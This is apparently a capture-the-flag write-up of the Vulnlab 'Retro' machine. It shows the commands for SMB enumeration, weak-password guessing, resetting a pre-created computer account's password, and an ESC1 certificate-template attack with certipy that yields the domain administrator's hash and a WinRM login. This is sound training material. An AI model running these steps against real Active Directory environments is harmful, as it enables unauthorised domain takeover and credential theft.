Vulnlab — Retro

ARZ101
4 min readSep 1, 2023

Retro, an easy rated machine, involved enumerating smb shares to find an account having a weak password, further finding a note about pre-created computer account having enrollment rights on a template allowing to request a certificate on behalf of any other user dubbed as ESC1 template attack.

NMAP

PORT      STATE SERVICE    VERSION          
53/tcp open tcpwrapped
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
636/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after: 2024-07-22T21:06:31
| MD5: c1f0bac716e071c2bcb943273d569612
|_SHA-1: 7f37ea6965982430f9180a65bcadde76add6fea6
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after: 2024-01-24T09:53:42
| MD5: 89ccbcee0485b170bbd1ebee3de93784
|_SHA-1: 2bfca683288bc59e2d2f9ffe01775d871c8c272d
9389/tcp open tcpwrapped
49664/tcp open tcpwrapped
49672/tcp open tcpwrapped
49683/tcp open tcpwrapped
49708/tcp open tcpwrapped

On Enumerating SMB with null authentication we can find few shares

From the Trainees share, we'll get Important.txt which talks about having weak passwords on the trainees account and also mentions about bundling all of their account into one general trainee account

So verifying if the account is trainee through kebrute

kerbrute userenum --dc 10.10.108.245 -d retro.vl user.txt

We could have figured this out without guessing as well through lookupsid.py from impacket with anonymous user

lookupsid.py anonymous@10.10.99.152 -no-pass

Since this account has a weak password, we can try common things like password being trainee, verifying it through crackmapexec

cme smb 10.10.99.152 -u 'trainee' -p 'trainee' --shares

We can now access Notes share and find a ToDo.txt file which talks about pre-created computer accounts

If we go back to the output of lookupsid, we’ll see a computer account BANKING$

The password for this account is the same as the name, on trying to login, it will show STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

In order to use this account, we need to change the password and this can be done through kpasswd which requires /etc/krb.conf to be modified

kpasswd BANKING$

This can be verified again with cme that the password has been changed

Enumerating ADCS with certipy , we see that authenticated users have enrollment rights but there isn't any template which be used with trainee user

However checking the BANKING$ account, there’s a template RetroClients on which domain computer have enrollment rights which can allow the machine accounts to enroll certificate on behalf of other users leading to ESC1 attack

certipy find -u 'BANKING$' -p 'Pass' -dc-ip 10.10.99.152 -stdout -vulnerable

On requesting administrator’s certificate, it’s going to show an error that it doesn’t meet the minimum key size which by default certipy sends with 2048 length

Specifying the key size to be of 4096 will resolve this issue

certipy req -u 'banking$'@retro.vl -p 'P@ss12345' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096

With this certificate, administrator’s hash can be retrieved

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.99.152

Through evil-winrm we can login on WinRM using the NThash of administrator

References

--

--